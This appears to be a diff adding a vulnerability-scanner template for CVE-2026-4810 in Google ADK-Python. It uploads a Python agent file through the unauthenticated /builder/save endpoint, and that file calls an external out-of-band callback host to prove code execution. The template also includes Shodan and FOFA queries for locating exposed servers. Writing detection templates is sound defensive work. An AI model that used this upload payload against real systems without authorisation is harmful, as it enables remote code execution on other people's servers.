|
| 1 | +id: CVE-2026-4810 |
| 2 | + |
| 3 | +info: |
| 4 | + name: Google ADK-Python - Unauthenticated Builder Endpoint (Pre-RCE) |
| 5 | + author: dwisiswant0 |
| 6 | + severity: critical |
| 7 | + description: | |
| 8 | + Google Agent Development Kit for Python (adk-python) versions 1.7.0 through 1.28.1 |
| 9 | + (and 2.0.0a1 through 2.0.0a2) expose unauthenticated builder API endpoints that |
| 10 | + accept arbitrary file uploads, including Python modules. Combined with unvalidated |
| 11 | + dynamic imports in the agent loading pipeline (importlib.import_module), this allows |
| 12 | + unauthenticated remote code execution. |
| 13 | + impact: | |
| 14 | + Unauthenticated remote attackers can execute arbitrary code on the server, leading to full system compromise. |
| 15 | + remediation: | |
| 16 | + Upgrade to versions 1.28.1 and 2.0.0a2 or later and redeploy to production and local environments. |
| 17 | + reference: |
| 18 | + - https://nvd.nist.gov/vuln/detail/CVE-2026-4810 |
| 19 | + - https://github.com/google/adk-python/blob/main/CHANGELOG.md |
| 20 | + classification: |
| 21 | + cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:P/U:Amber |
| 22 | + cvss-score: 9.3 |
| 23 | + cve-id: CVE-2026-4810 |
| 24 | + cwe-id: CWE-306,CWE-94 |
| 25 | + metadata: |
| 26 | + verified: true |
| 27 | + max-request: 2 |
| 28 | + vendor: google |
| 29 | + product: adk-python |
| 30 | + shodan-query: title:"ADK" http.component:"uvicorn" |
| 31 | + fofa-query: body="ADK" && header="uvicorn" |
| 32 | + tags: cve,cve2026,adk,google,rce,unauth,code-injection |
| 33 | + |
| 34 | +variables: |
| 35 | + multipart_boundary: "{{md5(date_time('2006-01-02T15:04:05Z07:00'))}}" |
| 36 | + agent_name: "{{rand_text_alpha(1)}}{{rand_text_alpha(7)}}" |
| 37 | + rand_instruction: "{{rand_base(12)}}" |
| 38 | + |
| 39 | +http: |
| 40 | + - raw: |
| 41 | + - | |
| 42 | + POST /builder/save HTTP/1.1 |
| 43 | + Host: {{Hostname}} |
| 44 | + Accept-Encoding: gzip, deflate, zstd |
| 45 | + Accept: */* |
| 46 | + Connection: keep-alive |
| 47 | + Content-Type: multipart/form-data; boundary={{multipart_boundary}} |
| 48 | +
|
| 49 | + --{{multipart_boundary}} |
| 50 | + Content-Disposition: form-data; name="files"; filename="{{agent_name}}/agent.py" |
| 51 | + Content-Type: text/x-python |
| 52 | +
|
| 53 | + import requests |
| 54 | + response = requests.get("http://{{interactsh-url}}") |
| 55 | + print(response.text) |
| 56 | + from google.adk.agents import Agent |
| 57 | + root_agent = Agent(name="{{agent_name}}", model="gemini-2.0-flash", instruction="{{rand_instruction}}") |
| 58 | +
|
| 59 | + --{{multipart_boundary}}-- |
| 60 | + - | |
| 61 | + GET /list-apps?detailed=true HTTP/1.1 |
| 62 | + Host: {{Hostname}} |
| 63 | + Connection: close |
| 64 | +
|
| 65 | + matchers-condition: and |
| 66 | + matchers: |
| 67 | + - type: dsl |
| 68 | + dsl: |
| 69 | + - status_code_1 == 200 |
| 70 | + - contains(body_1, "true") |
| 71 | + - status_code_2 == 200 |
| 72 | + - contains(body_2, concat("\"", agent_name, "\"")) |
| 73 | + condition: and |
| 74 | + |
| 75 | + - type: word |
| 76 | + part: interactsh_protocol |
| 77 | + words: |
| 78 | + - dns |
0 commit comments